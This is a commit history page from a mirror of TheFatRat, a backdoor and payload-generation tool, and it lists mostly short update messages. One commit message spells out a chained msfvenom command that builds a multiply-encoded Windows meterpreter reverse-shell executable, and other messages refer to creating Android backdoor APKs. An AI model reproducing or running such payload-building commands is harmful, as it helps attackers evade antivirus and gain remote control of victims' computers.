0
0
Fork 0
mirror of https://github.com/Screetsec/TheFatRat.git synced 2023-12-14 02:02:58 +01:00
Commit graph

52 commits

Author SHA1 Message Date
peterpt
4ff99e1a65 version change
just to update the version of fatrat .
glitch in last patch made it return to 1.8
2017-02-27 20:01:03 +00:00
peterpt
89f6d9cdb9 Update fatrat 2017-02-27 06:39:40 -05:00
peterpt
0fcde244a4 update patch
quick patch to remove screen output errors when apk payload is not build successfully
2017-02-27 05:28:11 -05:00
peterpt
f4ede7c7d1 version update
version update
2017-02-26 21:31:01 -05:00
peterpt
cbe19dabf7 improvements
some bugs fixed on apk rat creation
2017-02-26 20:37:28 -05:00
peterpt
460533d309 Update fatrat 2017-02-26 16:27:11 -05:00
peterpt
1dd081574c update
- fatrat will now detect if user selected apk is valid 
- fatrat will create the payload apk for the ruby apk merge

This way , apk option 5 can be used by users with masfvenom in their system path , and with users without msfvenom in their system path
2017-02-26 16:12:13 -05:00
peterpt
41f7027c29 update
adapted fatrat settings to new config folder
2017-02-23 14:20:10 -05:00
Edo -maland-
66378e3fa7 Update fatrat 2017-02-22 18:05:48 +07:00
peterpt
3e5828c187 text add
simple text added on user promp to point the user .
2017-02-21 15:58:56 -05:00
peterpt
19e4f62704 fatrat adaptation to new setup
some previous errors fixed and fatrat adapted to new setup file
2017-02-21 13:26:32 -05:00
Edo -maland-
4771577df9 fixed 2017-02-14 15:49:37 +07:00
Edo -maland-
be65c4e834 Delete fatrat 2017-02-14 15:48:39 +07:00
Edo -maland-
5e374a75ed Update fatrat-1.8.1 2017-02-14 15:30:25 +07:00
Edo -maland-
039c31157e update TFR v1.8 ( 29/01/2017 ) 2017-01-29 12:05:45 +07:00
Edo -maland-
7b92781876 Delete fatrat 2017-01-29 12:04:42 +07:00
Edo -maland-
88cc1a4cfc Update fatrat v1.7 ( 5/11/2016 ) 2016-11-06 00:02:28 +07:00
Edo -maland-
002a3c4592 Update fatrat 2016-11-05 23:57:52 +07:00
Edo -maland-
9da62c6385 thefatrat update v1.7 ( 6-11-16 ) 2016-11-05 23:40:07 +07:00
Edo -maland-
24ac584f50 Delete fatrat 2016-11-05 23:37:09 +07:00
Edo -maland-
72b3d753e4 Update 27/10/16 2016-10-27 17:35:39 +07:00
Edo -maland-
dac5fad978 Update 27/10/2016 2016-10-27 17:28:03 +07:00
Edo -maland-
a47aded65b Fixed Bug TheFatrat ( 16-10-2016) 2016-10-16 01:23:05 +07:00
Edo -maland-
19e58112a2 Update thefatrat v1.6 ( 13-10-16 ) 2016-10-14 06:02:46 +07:00
Edo -maland-
01b39c2498 Update fatrat 2016-10-13 05:29:35 +07:00
Edo -maland-
37f04b00ba Update fatrat ( 27-09-2016 ) 2016-09-27 21:19:49 +07:00
Edo -maland-
a7a60b97b6 Update v1.6 ( 16-09-2016 ) 2016-09-16 17:23:50 +07:00
Edo -maland-
269d7f44f7 Update v1.6 ( 16-09-2016 ) 2016-09-16 16:36:54 +07:00
Edo -maland-
1dcb9dd1d0 Update v1.6 ( 14-09-2016 ) 2016-09-16 16:35:29 +07:00
Edo -maland-
60f41701c6 Update v1.6 ( 16-09-2016 ) 2016-09-16 12:43:49 +07:00
Edo -maland-
fe05469497 Update v1.6 ( 15-09-2016 ) 2016-09-14 20:21:41 +07:00
Edo -maland-
186ae9aad6 Update v1.6 ( 15-09-2016 ) 2016-09-14 20:12:32 +07:00
Edo -maland-
47165c18fb Update v1.6 ( 15-09-2016 ) 2016-09-14 19:54:13 +07:00
Edo -maland-
b6dc9cd682 Update fatrat 2016-09-14 10:59:44 +07:00
Edo -maland-
e231ee11b6 Update v1.6 ( 14-09-2016 ) 2016-09-14 00:57:17 +07:00
Edo -maland-
7e913fa472 Update v1.6 ( 14-09-2016 ) 2016-09-14 00:40:04 +07:00
Edo -maland-
f3823e826a Delete fatrat 2016-09-14 00:39:10 +07:00
Edo -maland-
fff09dcea3 Update fatrat 2016-09-02 13:10:38 +07:00
Edo -maland-
64325a2ea8 Update fatrat 2016-09-01 17:58:24 +07:00
Edo -maland-
76b9959e9f Update fatrat 2016-09-01 17:00:25 +07:00
Edo -maland-
d6e369bf52 Update fatrat v1.5 ( read changelog ) 2016-09-01 11:44:43 +07:00
Edo -maland-
88324dc752 add msfvenom multi encoder in menu [1] for windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | msfvenom  -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o FatRat.exe
2016-08-25 20:16:36 +07:00
Edo -maland-
1ce9cad964 add msfvenom multi encoder in menu [1] for windows 2016-08-25 19:47:08 +07:00
Edo -maland-
d2bea48039 add msfvenom multi encoders in menu 1 for windows 2016-08-25 19:44:24 +07:00
Edo -maland-
41eed138f4 Fix missing command in create backdoor android 2016-08-25 16:13:00 +07:00
Edo -maland-
2b49f6e67b Update fatrat 2016-08-15 17:11:28 +07:00
Edo -maland-
0314df5899 Update fatrat 2016-08-07 14:38:52 +07:00
Edo -maland-
31eea264bc Update fatrat to 1.2 codename : Xenogenesis 2016-08-07 14:00:08 +07:00
Edo -maland-
aebbe12988 Delete fatrat 2016-08-07 13:59:38 +07:00
Edo -maland-
7fee309439 add apt-get install mingw32 for fix the problem 2016-08-02 19:42:27 +07:00